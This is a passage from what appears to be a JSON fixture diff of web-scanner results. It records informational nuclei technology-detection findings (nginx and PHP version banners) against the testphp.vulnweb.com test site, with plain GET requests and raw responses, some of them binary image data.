AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.1788.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3", + "discovered_date": "2024-11-13T02:34:56.955Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.1788.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:52 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 251, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4688.4 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01", + "discovered_date": "2024-11-13T02:34:57.026Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4688.4 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:52 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 252, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L", + "discovered_date": "2024-11-13T02:34:57.106Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:52 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 253, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/17.3' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3", + "discovered_date": "2024-11-13T02:34:57.189Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/17.3\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:52 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 254, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "php", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3", + "discovered_date": "2024-11-13T02:34:57.270Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:52 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 255, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01", + "discovered_date": "2024-11-13T02:34:57.342Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:52 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 256, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.82' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/2.jpg.tn", + "discovered_date": "2024-11-13T02:34:57.450Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/2.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.82\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1353\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:34:53 GMT\r\nEtag: "4dca64a1-549"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001a\u0002\u0003\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006��+\u0010\u0002\u0002\u0001\u0004\u0002\u0002\u0004\u0007\u0001\u0002\u0011\u0003\u0004\u0012!1AQ"a\u00142q�\u0005\u0013$B�����\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0001\u0002\u0004\u0005\u0006\u0007��'\u0011\u0002\u0002\u0001\u0004\u0002\u0002\u0001\u0005\u0001\u0001\u0002\u0011\u0003\u0004\u0012!1\u0005Q\u00132A"#3aq���\f\u0003\u0001\u0002\u0011\u0003\u0011?���d�H䏺JU�\t\u000f\b�i{\u0015+f�.7<������B6�˨����͒\u001bdס\u001a�i�E�n�_��%\u001atN\f�pR�H\u001d�,֝�\u0001 \u0014@'DQ\u0003Qu?b�-\u0010\u0005�L\t-\u0005�\u0001��\fH�'A\u0015F�\u001a�ʔ?z3G�^�|����b�#����K�)�ۓ�l�%��"䨤�\u001f�u\u0015Ed44�2\u0005�S�D\u0002Y\u0005F�`H\u0001\r\u0011L`"�)4(\fF�,�����\u0003%C�9��1F�$�c$��\u000f�~�Q_�ק{c'K�#��r|�R��(�Ԥ�I}#;��k�ʚ��ϳf���EmZ\u0010��\u0012Kȶ�А��C\u0001Z\u001a�B�\u0006Ҵ1I\n\u0004�X�\u001com�\u0004�,�7\u000e�}�\\1�,�\u001f\u0017��#�wG�ϫ�\u0016���dPf�<\u0013�K��G�4j��\u001c�i�$���a���j�4C\u000b���g�8�`�.�Μy)�N��?��j��\u001a�*�w\u0016�����),\u0012�5b����/�g%��[7e�b�\u001a�/�$�fiƎ֛3�����Х�5b�ޥ�@%Ţ\b\u0019v\u0014E\u0012M�(�\u0018\b�w1h��(���\u001e\u001a7��C\u001c���_�\f{,��َ[]��kp��p}\u001d?ĹI��'�&�jq���0����WO����kV���}\u001bq�|�c]�q5\u0018��p\u0013�J�3��]Fhe�\u0018��K�4�%r}��W��à��d�h�}��-�\\��\u001c�E��+B�+^�4j��\u0004\u0010�}�\u0004\fN�qb�Qe?e`6�\u001b~Ȣې�6߲v��܄&��\u0014C��J�x�\n>njlԑ��5CEY�3��j=�\nʱ��եj�б�N����f�p���k3��Ҿ�9���}3t���ψ�2J4�N\rvt���O��\u0018��>�q�%��\t��\u001fB��e�\u001bJ�\u001e�QM"(�»^,]�e\\FG2k�WAC�\r��.�bPQf���t[^\tP��Σ�(���\u00126�6�YlJ&���I\u0013D<���d\u0017 \u0006��p2�\u000e��m%\u000e6���uc���V��}��\u001dl*⏝y�J\u0019�K�Nn�N\u0012x�䋤rr%`\u0006-W���\u0013���Ed(�\u0003!�����P�8��k��\u0005)�?,+���;5\u0012�\f2���+��\u0004��e�2�\t7�6-"v�\u0001f�d�&ͺXA���Sh~�\\�W���%O��r��c\u0014�\u0004>Ό\u001b�CHe\u0014\b��\u0007��", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 257, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/3.jpg.tn", + "discovered_date": "2024-11-13T02:34:57.545Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/3.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3725\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:34:53 GMT\r\nEtag: "4dca64a1-e8d"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0004\u0003\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b��2\u0010\u0002\u0001\u0003\u0003\u0003\u0003\u0003\u0003\u0003\u0004\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061A\u0013"Q\u00142a\u0007q�\u0015B�\b\u0016#3C����\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0003\u0005\u0006\u0007\u0001\u0004��2\u0011\u0001\u0003\u0003\u0002\u0003\u0005\u0007\u0004\u0003\u0001\u0002\u0003\u0004\u00111\u0005!\u0012\u0013A\u0014Qaq�\u0006"#����2���3R���\f\u0003\u0001\u0002\u0011\u0003\u0011?��W�z�M.�wow\n�C$\u0012��\u001b�2\t�\u0004\u001f��V���\u0013u\u001b;6���Ŏp6�I�l<����I$�\r���xU�/E�]���\u001b\u0018\u0002�\u0010I�8\u0002�_A��\u001f\t;7�^�J��\u0013^\u0006��MB��N�M�]�k\u001b0Ei�\b\u0019���54R$��\u001c�b��\u001c�����V�}���&�ng�\u001at���\u0010�V^�\u001eB7���܌��\u000b�д\u000bk\u0013!���#\u001a��\u001f��\u0017�\u0018��@\u001cq��x��C��2Xn����^W��9��,\u001a=J�\r\u0015��[�V��N�n./u\u0012�\\Or-�F���\u000b�\t����v\u001cg<F*\u0012��JYLR\rǟ�KST����E\u0014Q^e��c\f\u001aJy\u0019�+�\\�t8&�JF)+�h��(B(��\u0010�F))�)���M�QE\u0014%-#���<u|�q��,�\u000e\u0016(W�.�� �(9��!N\f̀�\u001d\u0002H����1��#��j�]��6\u001a��픆+�w\u0012D�\u0003�����G��u=\u000b�r�!D�4��p�5�\r��\n6����\u000eq��\u0003�6��h���ψq\u001e�\u001f�UA�k�J8/a��wS�6�\u0010�\u0015\u0002M�㴞\b����|V\u0011\u0014*\r�\u0011K���Υ�b�\u001a�����\u0015\u001c"�\u001c��\u0005\u0001�)9�\u0004\u00023��\u0003Vnt����,��\u0018\f�,�����\b����;�T\u0018#4�\u0003��$_��Lj�s\u001fτ�\u0003�5F�e}^�錛�˹Q�ܟݸn\\�2pI�\u000e\u0018��p�A\u001bD�$c+�\u001bP�\u000e�r�}�ی�2@�+E�X��l��I$�\\͈�1�\u0018.�\u0005���\u001cs�c\u0007�n�\u001f�\u0012K�Y�\u0017��\u000eO�6\u0001 \u0012pH\u001cx�5\u0013�hkj�����^�\u0003�і4�T��\u0019쥺{�B[�=�<\n\u0010 �\u001d�m9ov�y�\u0003�;�[Qm+�fԯ`\u0002HmIJB�\u0002\u0015����\u0001��8���\u00157�w���RH�/��nTz��\t��;C�\u000f\u0019\u0007;\\�����Ҽ��29\u0006H\u001bm�:)��{\u0014%�w��4\u000f�{�R�K\u001b�)R{���KA��y\u0019U)�� n%�p2ɮ���4gP�@%Cn�|���s\u001e���=\u0002���L�wH���\u0005Q���B�\u001carX�[�\u0018�^X�Z��\u000fy�R���n\u001e�\nѤ��$3����.s�d`�\r�U�\u0004��\u0011�1����\u000b�|�T\r\u000e���#��zӲ��dRm��-. �����x�`q��7WW�\u0019\u0004py�KTw���\u0015k�^&�\u0014dc�\u0015!\u0019�L#\u0014�\u0013�u�QE\u0015ĤS[�:���Rٔ�QEq8��\u0010x�>�\u0016ݣv{�J����wY\u000b��E@op\u0007\u001f4G4��,���J����YO��G�J�u1�p�\u0016�������:�]Һ��P����+i\u000b<\u0013�;�\u0002\n����c������2\u000b��m6+�\u0016�\u0019��\u0006H��2�\u0006�\u0002�\u0005H�H'#\f8��f�w��t���t�7���`��Z\u0003�����x\u0004�\f�q���ƈ+�|f�\u001e�R��@w����>$�2����h��P\u0010v��\u00078� \u000e\u000f\u001c5c���x`\u0019&\u0017b_�y \f\u00021�ry>\u0006\u0001���L~�麪J���:X��\u0018�2����l(,s�q��8�ߤ���^�]\t��\u0005e�\u0010\u0006��;�a�\u001d��L��g\u0015V��梮��45����c�u3Y<U\u0014�\u0010�\\G��(��\u0004S.S�v�)]�8?�T���U��6�g;U\u0007���\u0007�p+Ch?��eN�͂�z\\[\u000b\tV�=1\u0011f!��\u0018݁��+��O\u0003�\u0006Z����els\u001cq�����}�\u0003\u0005����\u0005\fFv��S�\u001dr�D��9��k���O\u0004!w˳n�\u0016*�\u0001��\u001d��\u0003�U5�uN�6�&�B�{i�h���e)\u0018dS��\u001e\t\u0019�\u00185\u001eA\u001b/{\\\u000e�EE<�0�\u001aE��������Er�a�$�\u0018���.�\u0015��(��u�$`\r7a��B\u0001MU\u0002�{=-�}�5^�q�(\\7)�3Y�#�5-\u001e?B�oRɑ����z���I]��;�v���TG����9��#A\u001e)��|f�6+���z]�\u0015�ݴ��͆��FSϴ��mĀ�\n\u0014}ÀvΐV��$��E��\b\u001d�d�z{�l0���A�\u0018\r��+�S�\u0015���̈:;U�\u0018��o�C\u001e��\fH\u0014�9�nq��\u001a��\\�Z\u0007�<c�\u001f\u001f�{�c\u0012�\u001er�\u001d�P�@��E\u001c��+�W�k�^?\u0004\u000f��S��M�\u00078=����Hc�y�� S#���\t��o�{)$g `�dR�-��b\u0002��\u001d(!^��L�\\�Z\u0005����J�,ņ\u0006;\fg����ߨ�a��ԗ\u001af�,Q�X��n�\u0004�%�9\u0019V�;�3�\u001cv[�k\u000b)�YA�����A�\u0019��\u000f��\u0016��\u001a���s~>�c{q$�4r\b�"�IȐ�<�Kc䚶�3Hǽ�5\r\u0016h�����Z�Ao���[WGu����jVs�(�}5�.^\u0010�\u00138bQ@]ː9<�}�kg�\u001f\u0007k.@8a�23��kJ�.��Ӭn.���P��E\n�\u001cl�\u0018����p�x>�ʫ)\u0015�A\u001b��Y$���Ycm�c�\u0018\\|g�{��Q��Բ�YL�X��\u0002�w/~�\u001c��:glz}n��\u0014����eWJ�n�\u0014QE\tK��S�?�\u001e���e��2�~����~(E�h��w���Tl�⤢�\u0003eRH�v��@�\u0004�3�\t<e~���W\b��vn\u0018n\u0001�y ��\u0012��G\u0016��)�6ޙ �������3\u001b��?\u0014�7\u0002\u0017�l��Դ�.QU��E�#�~8#8$g���ޑ-�^��Kp���aLͱG~\u0013;s�8�'�q\\�􃨮.\u0012]\u001a�帒\u0012\u001a\u0007 �H�\u0014�\u0003\u0001U��'�'\u001c\fV��j����Z��%\t\u001eb�Uf�;\u0010�X/%w0�9�k*�����4;���\u0015ޒx*!�:�\u0019X�n�^�%�\u0001�0�F�I��\u0018��8 \u001c��d2�\u0007���ŧY�a�8�t��Q\u0019db��\u0018��I\u0018�rN1��V8�\u0015�QD�Jv���\u001fUI������D�K[�qf���*�m\u0004�\u0019�?8�#=�Z����.��I�C��b��\u001c[��#ö<n\bW�\u0005��8 �9��6IP�\t���yq\u001c��7PA��=��\u0015�0 1�+s��2\u0006pO��*�9.����d��=R�d<��\\��\u001f��l���\u000f�ț,\be�q�8$v�<g�\u0017�y���M�ҭ�./�`N@P\u0019�\u0004�\u00120q�ۃ�v\u0016\u001b�"��Ťv2q���ѩ��\u001eI(��ez\u0017������F�(��$�(?ju\u0015�ۨ�~iʠS��Ⱥ\u0001 �RJŁ&��v���\u0005\u0001:\u000b��+������>U���ߐFA\u001eA"��D�V}C���\u0005\f���wo'��\u0019'i�T��|�������\u001c�CE֯�[�u�ʊ���H�ш�q�\u0016\\�\u001c3\f�j\u001fX�;|<,6p�|���ON���]���Wf�ڰ.�Vu \u0015�\u0006\u0016@G�9<\u001e���\u001d�����Giz�Ŕ:��ۥ���T��h��z��\u0006=�vFs�r\t�4�s^�7��Ý�\u0011�FW��>T�\ft�V$��O�[����\u0013\bcc#M\u0004�\u0019W����Gܮ\u001c��\n~r(i��jw\u0006\u0018Z<�/���F��x\u0007\u0004�b21��m�u�XZ�*�Fھ��ҰEM��$*������c���D}��RzE\u0003��H���a��\u001a�{�0���s����2�(��ך�\u00063ڢ����F�(��"�(�\b��(Bl�mEE\u0015Ġ�\u0006�'=袄���\u000e�w�j�wd�:�Y\u0018e%O(�ʜv�\u00020@5�:�6WWqDIX����q�E\u0015�n�\u0007����x�ߴ�+m6��e\nč#;rX�\u001e�I$��w�\u0006�\\0\u0017�7��U\u0003\r\u0018\u000b��\u0011��9\u0018�\u0004w�<`��Ⱦ$�/����*�rțö>�W��\u0013�O.�=�П�.�\u0004\u0001��c�Y!\n��Wv�v�\u0019e\u0007�\u0015��f��ӧ��mn����B������8ݑ�؁��<`��(�:��\u000f�L�Od�����1��igw|��)��\u0004��\u00078����;�98�@�E\u0015\u0017�1���E�\u001f`�����\u0002�}���", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 258, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/1.jpg.tn", + "discovered_date": "2024-11-13T02:34:57.645Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/1.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4355\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:34:53 GMT\r\nEtag: "4dca64a1-1103"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: 